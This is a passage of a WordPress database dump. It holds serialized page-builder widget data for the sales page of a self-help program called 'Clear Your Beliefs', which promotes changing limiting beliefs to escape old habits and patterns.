life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:17:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:23:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1541, 1981, 'panels_data', 'a:3:{s:7:"widgets";a:26:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:20:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:26:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1546, 2002, 'panels_data', 'a:3:{s:7:"widgets";a:27:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:0:"";s:4:"text";s:228:"<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent 